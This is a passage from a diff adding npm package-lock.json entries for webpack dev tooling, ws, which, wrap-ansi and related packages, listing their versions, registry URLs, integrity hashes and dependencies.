"^4.6.0", + "mime-types": "^2.1.31", + "on-finished": "^2.4.1", + "range-parser": "^1.2.1", + "schema-utils": "^4.0.0" + }, + "engines": { + "node": ">= 18.12.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + }, + "peerDependencies": { + "webpack": "^5.0.0" + }, + "peerDependenciesMeta": { + "webpack": { + "optional": true + } + } + }, + "node_modules/webpack-dev-middleware/node_modules/ajv": { + "version": "8.17.1", + "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.17.1.tgz", + "integrity": "sha512-B/gBuNg5SiMTrPkC+A2+cW0RszwxYmn6VYxB/inlBStS5nx6xHIt/ehKRhIMhqusl7a8LjQoZnjCs5vhwxOQ1g==", + "dev": true, + "license": "MIT", + "dependencies": { + "fast-deep-equal": "^3.1.3", + "fast-uri": "^3.0.1", + "json-schema-traverse": "^1.0.0", + "require-from-string": "^2.0.2" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/epoberezkin" + } + }, + "node_modules/webpack-dev-middleware/node_modules/ajv-keywords": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/ajv-keywords/-/ajv-keywords-5.1.0.tgz", + "integrity": "sha512-YCS/JNFAUyr5vAuhk1DWm1CBxRHW9LbJ2ozWeemrIqpbsqKjHVxYPyi5GC0rjZIT5JxJ3virVTS8wk4i/Z+krw==", + "dev": true, + "license": "MIT", + "dependencies": { + "fast-deep-equal": "^3.1.3" + }, + "peerDependencies": { + "ajv": "^8.8.2" + } + }, + "node_modules/webpack-dev-middleware/node_modules/json-schema-traverse": { + "version": "1.0.0", + "resolved": 
"https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-1.0.0.tgz", + "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==", + "dev": true, + "license": "MIT" + }, + "node_modules/webpack-dev-middleware/node_modules/memfs": { + "version": "4.17.0", + "resolved": "https://registry.npmjs.org/memfs/-/memfs-4.17.0.tgz", + "integrity": "sha512-4eirfZ7thblFmqFjywlTmuWVSvccHAJbn1r8qQLzmTO11qcqpohOjmY2mFce6x7x7WtskzRqApPD0hv+Oa74jg==", + "dev": true, + "license": "Apache-2.0", + "dependencies": { + "@jsonjoy.com/json-pack": "^1.0.3", + "@jsonjoy.com/util": "^1.3.0", + "tree-dump": "^1.0.1", + "tslib": "^2.0.0" + }, + "engines": { + "node": ">= 4.0.0" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/streamich" + } + }, + "node_modules/webpack-dev-middleware/node_modules/on-finished": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/on-finished/-/on-finished-2.4.1.tgz", + "integrity": "sha512-oVlzkg3ENAhCk2zdv7IJwd/QUD4z2RxRwpkcGY8psCVcCYZNq4wYnVWALHM+brtuJjePWiYF/ClmuDr8Ch5+kg==", + "dev": true, + "license": "MIT", + "dependencies": { + "ee-first": "1.1.1" + }, + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/webpack-dev-middleware/node_modules/schema-utils": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/schema-utils/-/schema-utils-4.3.0.tgz", + "integrity": "sha512-Gf9qqc58SpCA/xdziiHz35F4GNIWYWZrEshUc/G/r5BnLph6xpKuLeoJoQuj5WfBIx/eQLf+hmVPYHaxJu7V2g==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/json-schema": "^7.0.9", + "ajv": "^8.9.0", + "ajv-formats": "^2.1.1", + "ajv-keywords": "^5.1.0" + }, + "engines": { + "node": ">= 10.13.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + } + }, + "node_modules/webpack-dev-server": { + "version": "5.2.1", + "resolved": "https://registry.npmjs.org/webpack-dev-server/-/webpack-dev-server-5.2.1.tgz", + "integrity": "sha512-ml/0HIj9NLpVKOMq+SuBPLHcmbG+TGIjXRHsYfZwocUBIqEvws8NnS/V9AFQ5FKP+tgn5adwVwRrTEpGL33QFQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/bonjour": "^3.5.13", + "@types/connect-history-api-fallback": "^1.5.4", + "@types/express": "^4.17.21", + "@types/express-serve-static-core": "^4.17.21", + "@types/serve-index": "^1.9.4", + "@types/serve-static": "^1.15.5", + "@types/sockjs": "^0.3.36", + "@types/ws": "^8.5.10", + "ansi-html-community": "^0.0.8", + "bonjour-service": "^1.2.1", + "chokidar": "^3.6.0", + "colorette": "^2.0.10", + "compression": "^1.7.4", + "connect-history-api-fallback": "^2.0.0", + "express": "^4.21.2", + "graceful-fs": "^4.2.6", + "http-proxy-middleware": "^2.0.7", + "ipaddr.js": "^2.1.0", + "launch-editor": "^2.6.1", + "open": "^10.0.3", + "p-retry": "^6.2.0", + "schema-utils": "^4.2.0", + "selfsigned": "^2.4.1", + "serve-index": "^1.9.1", + "sockjs": "^0.3.24", + "spdy": "^4.0.2", + "webpack-dev-middleware": "^7.4.2", + "ws": "^8.18.0" + }, + "bin": { + "webpack-dev-server": "bin/webpack-dev-server.js" + }, + "engines": { + "node": ">= 18.12.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + }, + "peerDependencies": { + "webpack": "^5.0.0" + }, + "peerDependenciesMeta": { + "webpack": { + "optional": true + }, + "webpack-cli": { + "optional": true + } + } + }, + "node_modules/webpack-dev-server/node_modules/@types/express": { + "version": "4.17.21", + "resolved": "https://registry.npmjs.org/@types/express/-/express-4.17.21.tgz", + 
"integrity": "sha512-ejlPM315qwLpaQlQDTjPdsUFSc6ZsP4AN6AlWnogPjQ7CVi7PYF3YVz+CY3jE2pwYf7E/7HlDAN0rV2GxTG0HQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/body-parser": "*", + "@types/express-serve-static-core": "^4.17.33", + "@types/qs": "*", + "@types/serve-static": "*" + } + }, + "node_modules/webpack-dev-server/node_modules/ajv": { + "version": "8.17.1", + "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.17.1.tgz", + "integrity": "sha512-B/gBuNg5SiMTrPkC+A2+cW0RszwxYmn6VYxB/inlBStS5nx6xHIt/ehKRhIMhqusl7a8LjQoZnjCs5vhwxOQ1g==", + "dev": true, + "license": "MIT", + "dependencies": { + "fast-deep-equal": "^3.1.3", + "fast-uri": "^3.0.1", + "json-schema-traverse": "^1.0.0", + "require-from-string": "^2.0.2" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/epoberezkin" + } + }, + "node_modules/webpack-dev-server/node_modules/ajv-keywords": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/ajv-keywords/-/ajv-keywords-5.1.0.tgz", + "integrity": "sha512-YCS/JNFAUyr5vAuhk1DWm1CBxRHW9LbJ2ozWeemrIqpbsqKjHVxYPyi5GC0rjZIT5JxJ3virVTS8wk4i/Z+krw==", + "dev": true, + "license": "MIT", + "dependencies": { + "fast-deep-equal": "^3.1.3" + }, + "peerDependencies": { + "ajv": "^8.8.2" + } + }, + "node_modules/webpack-dev-server/node_modules/define-lazy-prop": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/define-lazy-prop/-/define-lazy-prop-3.0.0.tgz", + "integrity": "sha512-N+MeXYoqr3pOgn8xfyRPREN7gHakLYjhsHhWGT3fWAiL4IkAt0iDw14QiiEm2bE30c5XX5q0FtAA3CK5f9/BUg==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/webpack-dev-server/node_modules/ipaddr.js": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/ipaddr.js/-/ipaddr.js-2.2.0.tgz", + "integrity": "sha512-Ag3wB2o37wslZS19hZqorUnrnzSkpOVy+IiiDEiTqNubEYpYuHWIf6K4psgN2ZWKExS4xhVCrRVfb/wfW8fWJA==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 10" + } + }, + "node_modules/webpack-dev-server/node_modules/is-wsl": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/is-wsl/-/is-wsl-3.1.0.tgz", + "integrity": "sha512-UcVfVfaK4Sc4m7X3dUSoHoozQGBEFeDC+zVo06t98xe8CzHSZZBekNXH+tu0NalHolcJ/QAGqS46Hef7QXBIMw==", + "dev": true, + "license": "MIT", + "dependencies": { + "is-inside-container": "^1.0.0" + }, + "engines": { + "node": ">=16" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/webpack-dev-server/node_modules/json-schema-traverse": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-1.0.0.tgz", + "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==", + "dev": true, + "license": "MIT" + }, + "node_modules/webpack-dev-server/node_modules/open": { + "version": "10.1.1", + "resolved": "https://registry.npmjs.org/open/-/open-10.1.1.tgz", + "integrity": "sha512-zy1wx4+P3PfhXSEPJNtZmJXfhkkIaxU1VauWIrDZw1O7uJRDRJtKr9n3Ic4NgbA16KyOxOXO2ng9gYwCdXuSXA==", + "dev": true, + "license": "MIT", + "dependencies": { + "default-browser": "^5.2.1", + "define-lazy-prop": "^3.0.0", + "is-inside-container": "^1.0.0", + "is-wsl": "^3.1.0" + }, + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/webpack-dev-server/node_modules/schema-utils": { + "version": "4.3.0", + "resolved": 
"https://registry.npmjs.org/schema-utils/-/schema-utils-4.3.0.tgz", + "integrity": "sha512-Gf9qqc58SpCA/xdziiHz35F4GNIWYWZrEshUc/G/r5BnLph6xpKuLeoJoQuj5WfBIx/eQLf+hmVPYHaxJu7V2g==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/json-schema": "^7.0.9", + "ajv": "^8.9.0", + "ajv-formats": "^2.1.1", + "ajv-keywords": "^5.1.0" + }, + "engines": { + "node": ">= 10.13.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + } + }, + "node_modules/webpack-hot-middleware": { + "version": "2.25.3", + "resolved": "https://registry.npmjs.org/webpack-hot-middleware/-/webpack-hot-middleware-2.25.3.tgz", + "integrity": "sha512-IK/0WAHs7MTu1tzLTjio73LjS3Ov+VvBKQmE8WPlJutgG5zT6Urgq/BbAdRrHTRpyzK0dvAvFh1Qg98akxgZpA==", + "dev": true, + "dependencies": { + "ansi-html-community": "0.0.8", + "html-entities": "^2.1.0", + "strip-ansi": "^6.0.0" + } + }, + "node_modules/webpack-manifest-plugin": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/webpack-manifest-plugin/-/webpack-manifest-plugin-5.0.0.tgz", + "integrity": "sha512-8RQfMAdc5Uw3QbCQ/CBV/AXqOR8mt03B6GJmRbhWopE8GzRfEpn+k0ZuWywxW+5QZsffhmFDY1J6ohqJo+eMuw==", + "dev": true, + "dependencies": { + "tapable": "^2.0.0", + "webpack-sources": "^2.2.0" + }, + "engines": { + "node": ">=12.22.0" + }, + "peerDependencies": { + "webpack": "^5.47.0" + } + }, + "node_modules/webpack-manifest-plugin/node_modules/webpack-sources": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/webpack-sources/-/webpack-sources-2.3.1.tgz", + "integrity": "sha512-y9EI9AO42JjEcrTJFOYmVywVZdKVUfOvDUPsJea5GIr1JOEGFVqwlY2K098fFoIjOkDzHn2AjRvM8dsBZu+gCA==", + "dev": true, + "dependencies": { + "source-list-map": "^2.0.1", + "source-map": "^0.6.1" + }, + "engines": { + "node": ">=10.13.0" + } + }, + "node_modules/webpack-merge": { + "version": "5.10.0", + "resolved": "https://registry.npmjs.org/webpack-merge/-/webpack-merge-5.10.0.tgz", + "integrity": "sha512-+4zXKdx7UnO+1jaN4l2lHVD+mFvnlZQP/6ljaJVb4SZiwIKeUnrT5l0gkT8z+n4hKpC+jpOv6O9R+gLtag7pSA==", + "dev": true, + "dependencies": { + "clone-deep": "^4.0.1", + "flat": "^5.0.2", + "wildcard": "^2.0.0" + }, + "engines": { + "node": ">=10.0.0" + } + }, + "node_modules/webpack-merge/node_modules/wildcard": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/wildcard/-/wildcard-2.0.0.tgz", + "integrity": "sha512-JcKqAHLPxcdb9KM49dufGXn2x3ssnfjbcaQdLlfZsL9rH9wgDQjUtDxbo8NE0F6SFvydeu1VhZe7hZuHsB2/pw==", + "dev": true + }, + "node_modules/webpack-sources": { + "version": "3.2.3", + "resolved": "https://registry.npmjs.org/webpack-sources/-/webpack-sources-3.2.3.tgz", + "integrity": "sha512-/DyMEOrDgLKKIG0fmvtz+4dUX/3Ghozwgm6iPp8KRhvn+eQf9+Q7GWxVNMk3+uCPWfdXYC4ExGBckIXdFEfH1w==", + "dev": true, + "engines": { + "node": ">=10.13.0" + } + }, + "node_modules/webpack-virtual-modules": { + "version": "0.6.2", + "resolved": "https://registry.npmjs.org/webpack-virtual-modules/-/webpack-virtual-modules-0.6.2.tgz", + "integrity": "sha512-66/V2i5hQanC51vBQKPH4aI8NMAcBW59FVBs+rC7eGHupMyfn34q7rZIE+ETlJ+XTevqfUhVVBgSUNSW2flEUQ==", + "dev": true, + "license": "MIT" + }, + "node_modules/webpack/node_modules/acorn": { + "version": "8.14.0", + "resolved": "https://registry.npmjs.org/acorn/-/acorn-8.14.0.tgz", + "integrity": "sha512-cl669nCJTZBsL97OF4kUQm5g5hC2uihk0NxY3WENAC0TYdILVkAyHymAntgxGkl7K+t0cXIrH5siy5S4XkFycA==", + "dev": true, + "license": "MIT", + "bin": { + "acorn": "bin/acorn" + }, + "engines": { + "node": ">=0.4.0" + } + }, + 
"node_modules/webpack/node_modules/ajv": { + "version": "8.17.1", + "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.17.1.tgz", + "integrity": "sha512-B/gBuNg5SiMTrPkC+A2+cW0RszwxYmn6VYxB/inlBStS5nx6xHIt/ehKRhIMhqusl7a8LjQoZnjCs5vhwxOQ1g==", + "dev": true, + "license": "MIT", + "dependencies": { + "fast-deep-equal": "^3.1.3", + "fast-uri": "^3.0.1", + "json-schema-traverse": "^1.0.0", + "require-from-string": "^2.0.2" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/epoberezkin" + } + }, + "node_modules/webpack/node_modules/ajv-keywords": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/ajv-keywords/-/ajv-keywords-5.1.0.tgz", + "integrity": "sha512-YCS/JNFAUyr5vAuhk1DWm1CBxRHW9LbJ2ozWeemrIqpbsqKjHVxYPyi5GC0rjZIT5JxJ3virVTS8wk4i/Z+krw==", + "dev": true, + "license": "MIT", + "dependencies": { + "fast-deep-equal": "^3.1.3" + }, + "peerDependencies": { + "ajv": "^8.8.2" + } + }, + "node_modules/webpack/node_modules/events": { + "version": "3.3.0", + "resolved": "https://registry.npmjs.org/events/-/events-3.3.0.tgz", + "integrity": "sha512-mQw+2fkQbALzQ7V0MY0IqdnXNOeTtP4r0lN9z7AAawCXgqea7bDii20AYrIBrFd/Hx0M2Ocz6S111CaFkUcb0Q==", + "dev": true, + "engines": { + "node": ">=0.8.x" + } + }, + "node_modules/webpack/node_modules/json-schema-traverse": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-1.0.0.tgz", + "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==", + "dev": true, + "license": "MIT" + }, + "node_modules/webpack/node_modules/schema-utils": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/schema-utils/-/schema-utils-4.3.0.tgz", + "integrity": "sha512-Gf9qqc58SpCA/xdziiHz35F4GNIWYWZrEshUc/G/r5BnLph6xpKuLeoJoQuj5WfBIx/eQLf+hmVPYHaxJu7V2g==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/json-schema": "^7.0.9", + "ajv": "^8.9.0", + "ajv-formats": "^2.1.1", + "ajv-keywords": "^5.1.0" + }, + "engines": { + "node": ">= 10.13.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + } + }, + "node_modules/websocket-driver": { + "version": "0.7.4", + "resolved": "https://registry.npmjs.org/websocket-driver/-/websocket-driver-0.7.4.tgz", + "integrity": "sha512-b17KeDIQVjvb0ssuSDF2cYXSg2iztliJ4B9WdsuB6J952qCPKmnVq4DyW5motImXHDC1cBT/1UezrJVsKw5zjg==", + "dev": true, + "license": "Apache-2.0", + "dependencies": { + "http-parser-js": ">=0.5.1", + "safe-buffer": ">=5.1.0", + "websocket-extensions": ">=0.1.1" + }, + "engines": { + "node": ">=0.8.0" + } + }, + "node_modules/websocket-extensions": { + "version": "0.1.4", + "resolved": "https://registry.npmjs.org/websocket-extensions/-/websocket-extensions-0.1.4.tgz", + "integrity": "sha512-OqedPIGOfsDlo31UNwYbCFMSaO9m9G/0faIHj5/dZFDMFqPTcx6UwqyOy3COEaEOg/9VsGIpdqn62W5KhoKSpg==", + "dev": true, + "license": "Apache-2.0", + "engines": { + "node": ">=0.8.0" + } + }, + "node_modules/whatwg-encoding": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/whatwg-encoding/-/whatwg-encoding-2.0.0.tgz", + "integrity": "sha512-p41ogyeMUrw3jWclHWTQg1k05DSVXPLcVxRTYsXUk+ZooOCZLcoYgPZ/HL/D/N+uQPOtcp1me1WhBEaX02mhWg==", + "dev": true, + "dependencies": { + "iconv-lite": "0.6.3" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/whatwg-encoding/node_modules/iconv-lite": { + "version": "0.6.3", + "resolved": "https://registry.npmjs.org/iconv-lite/-/iconv-lite-0.6.3.tgz", + "integrity": 
"sha512-4fCk79wshMdzMp2rH06qWrJE4iolqLhCUH+OiuIgU++RB0+94NlDL81atO7GX55uUKueo0txHNtvEyI6D7WdMw==", + "dev": true, + "dependencies": { + "safer-buffer": ">= 2.1.2 < 3.0.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/whatwg-mimetype": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/whatwg-mimetype/-/whatwg-mimetype-3.0.0.tgz", + "integrity": "sha512-nt+N2dzIutVRxARx1nghPKGv1xHikU7HKdfafKkLNLindmPU/ch3U31NOCGGA/dmPcmb1VlofO0vnKAcsm0o/Q==", + "dev": true, + "engines": { + "node": ">=12" + } + }, + "node_modules/which": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", + "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", + "dependencies": { + "isexe": "^2.0.0" + }, + "bin": { + "node-which": "bin/node-which" + }, + "engines": { + "node": ">= 8" + } + }, + "node_modules/which-boxed-primitive": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/which-boxed-primitive/-/which-boxed-primitive-1.0.2.tgz", + "integrity": "sha512-bwZdv0AKLpplFY2KZRX6TvyuN7ojjr7lwkg6ml0roIy9YeuSr7JS372qlNW18UQYzgYK9ziGcerWqZOmEn9VNg==", + "dependencies": { + "is-bigint": "^1.0.1", + "is-boolean-object": "^1.1.0", + "is-number-object": "^1.0.4", + "is-string": "^1.0.5", + "is-symbol": "^1.0.3" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/which-builtin-type": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/which-builtin-type/-/which-builtin-type-1.1.3.tgz", + "integrity": "sha512-YmjsSMDBYsM1CaFiayOVT06+KJeXf0o5M/CAd4o1lTadFAtacTUM49zoYxr/oroopFDfhvN6iEcBxUyc3gvKmw==", + "dev": true, + "dependencies": { + "function.prototype.name": "^1.1.5", + "has-tostringtag": "^1.0.0", + "is-async-function": "^2.0.0", + "is-date-object": "^1.0.5", + "is-finalizationregistry": "^1.0.2", + "is-generator-function": "^1.0.10", + "is-regex": "^1.1.4", + "is-weakref": "^1.0.2", + "isarray": "^2.0.5", + "which-boxed-primitive": "^1.0.2", + "which-collection": "^1.0.1", + "which-typed-array": "^1.1.9" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/which-collection": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/which-collection/-/which-collection-1.0.1.tgz", + "integrity": "sha512-W8xeTUwaln8i3K/cY1nGXzdnVZlidBcagyNFtBdD5kxnb4TvGKR7FfSIS3mYpwWS1QUCutfKz8IY8RjftB0+1A==", + "dev": true, + "dependencies": { + "is-map": "^2.0.1", + "is-set": "^2.0.1", + "is-weakmap": "^2.0.1", + "is-weakset": "^2.0.1" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/which-module": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/which-module/-/which-module-2.0.0.tgz", + "integrity": "sha1-2e8H3Od7mQK4o6j6SzHD4/fm6Ho=", + "dev": true + }, + "node_modules/which-typed-array": { + "version": "1.1.15", + "resolved": "https://registry.npmjs.org/which-typed-array/-/which-typed-array-1.1.15.tgz", + "integrity": "sha512-oV0jmFtUky6CXfkqehVvBP/LSWJ2sy4vWMioiENyJLePrBO/yKyV9OyJySfAKosh+RYkIl5zJCNZ8/4JncrpdA==", + "license": "MIT", + "dependencies": { + "available-typed-arrays": "^1.0.7", + "call-bind": "^1.0.7", + "for-each": "^0.3.3", + "gopd": "^1.0.1", + "has-tostringtag": "^1.0.2" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/wide-align": { + "version": "1.1.3", + "resolved": 
"https://registry.npmjs.org/wide-align/-/wide-align-1.1.3.tgz", + "integrity": "sha512-QGkOQc8XL6Bt5PwnsExKBPuMKBxnGxWWW3fU55Xt4feHozMUhdUMaBCk290qpm/wG5u/RSKzwdAC4i51YigihA==", + "dependencies": { + "string-width": "^1.0.2 || 2" + } + }, + "node_modules/wide-align/node_modules/ansi-regex": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-3.0.1.tgz", + "integrity": "sha512-+O9Jct8wf++lXxxFc4hc8LsjaSq0HFzzL7cVsw8pRDIPdjKD2mT4ytDZlLuSBZ4cLKZFXIrMGO7DbQCtMJJMKw==", + "engines": { + "node": ">=4" + } + }, + "node_modules/wide-align/node_modules/is-fullwidth-code-point": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-2.0.0.tgz", + "integrity": "sha1-o7MKXE8ZkYMWeqq5O+764937ZU8=", + "engines": { + "node": ">=4" + } + }, + "node_modules/wide-align/node_modules/string-width": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/string-width/-/string-width-2.1.1.tgz", + "integrity": "sha512-nOqH59deCq9SRHlxq1Aw85Jnt4w6KvLKqWVik6oA9ZklXLNIOlqg4F2yrT1MVaTjAqvVwdfeZ7w7aCvJD7ugkw==", + "dependencies": { + "is-fullwidth-code-point": "^2.0.0", + "strip-ansi": "^4.0.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/wide-align/node_modules/strip-ansi": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-4.0.0.tgz", + "integrity": "sha1-qEeQIusaw2iocTibY1JixQXuNo8=", + "dependencies": { + "ansi-regex": "^3.0.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/wildcard": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/wildcard/-/wildcard-1.1.2.tgz", + "integrity": "sha1-pwIEUwhNjNLv5wup02liY94XEKU=", + "dev": true + }, + "node_modules/with": { + "version": "7.0.2", + "resolved": "https://registry.npmjs.org/with/-/with-7.0.2.tgz", + "integrity": "sha512-RNGKj82nUPg3g5ygxkQl0R937xLyho1J24ItRCBTr/m1YnZkzJy1hUiHUJrc/VlsDQzsCnInEGSg3bci0Lmd4w==", + "dependencies": { + "@babel/parser": "^7.9.6", + "@babel/types": "^7.9.6", + "assert-never": "^1.2.1", + "babel-walk": "3.0.0-canary-5" + }, + "engines": { + "node": ">= 10.0.0" + } + }, + "node_modules/wkx": { + "version": "0.5.0", + "resolved": "https://registry.npmjs.org/wkx/-/wkx-0.5.0.tgz", + "integrity": "sha512-Xng/d4Ichh8uN4l0FToV/258EjMGU9MGcA0HV2d9B/ZpZB3lqQm7nkOdZdm5GhKtLLhAE7PiVQwN4eN+2YJJUg==", + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/word-wrap": { + "version": "1.2.5", + "resolved": "https://registry.npmjs.org/word-wrap/-/word-wrap-1.2.5.tgz", + "integrity": "sha512-BN22B5eaMMI9UMtjrGd5g5eCYPpCPDUy0FJXbYsaT5zYxjFOckS53SQDE3pWkVoWpHXVb3BrYcEN4Twa55B5cA==", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/wordwrap": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/wordwrap/-/wordwrap-1.0.0.tgz", + "integrity": "sha1-J1hIEIkUVqQXHI0CJkQa3pDLyus=", + "dev": true + }, + "node_modules/workerpool": { + "version": "6.5.1", + "resolved": "https://registry.npmjs.org/workerpool/-/workerpool-6.5.1.tgz", + "integrity": "sha512-Fs4dNYcsdpYSAfVxhnl1L5zTksjvOJxtC5hzMNl+1t9B8hTJTdKDyZ5ju7ztgPy+ft9tBFXoOlDNiOT9WUXZlA==", + "license": "Apache-2.0" + }, + "node_modules/wrap-ansi": { + "version": "7.0.0", + "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", + "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", + "dependencies": { + "ansi-styles": "^4.0.0", + "string-width": "^4.1.0", + "strip-ansi": "^6.0.0" + }, + "engines": { + "node": 
">=10" + }, + "funding": { + "url": "https://github.com/chalk/wrap-ansi?sponsor=1" + } + }, + "node_modules/wrap-ansi-cjs": { + "name": "wrap-ansi", + "version": "7.0.0", + "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", + "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", + "dev": true, + "dependencies": { + "ansi-styles": "^4.0.0", + "string-width": "^4.1.0", + "strip-ansi": "^6.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/wrap-ansi?sponsor=1" + } + }, + "node_modules/wrap-ansi-cjs/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/wrap-ansi/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/wrappy": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", + "integrity": "sha1-tSQ9jz7BqjXxNkYFvA0QNuMKtp8=" + }, + "node_modules/write-file-atomic": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-5.0.1.tgz", + "integrity": "sha512-+QU2zd6OTD8XWIJCbffaiQeH9U73qIqafo1x6V1snCWYGJf6cVE0cDR4D8xRzcEnfI21IFrUPzPGtcPf8AC+Rw==", + "dev": true, + "dependencies": { + "imurmurhash": "^0.1.4", + "signal-exit": "^4.0.1" + }, + "engines": { + "node": "^14.17.0 || ^16.13.0 || >=18.0.0" + } + }, + "node_modules/write-file-atomic/node_modules/signal-exit": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", + "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", + "dev": true, + "engines": { + "node": ">=14" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/ws": { + "version": "8.18.0", + "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.0.tgz", + "integrity": "sha512-8VbfWfHLbbwu3+N6OKsOMpBdT4kXPDDB9cJk2bJ6mh9ucxdlnNvH1e+roYkKmN9Nxw2yjz7VzeO9oOz2zJ04Pw==", + "dev": true, + 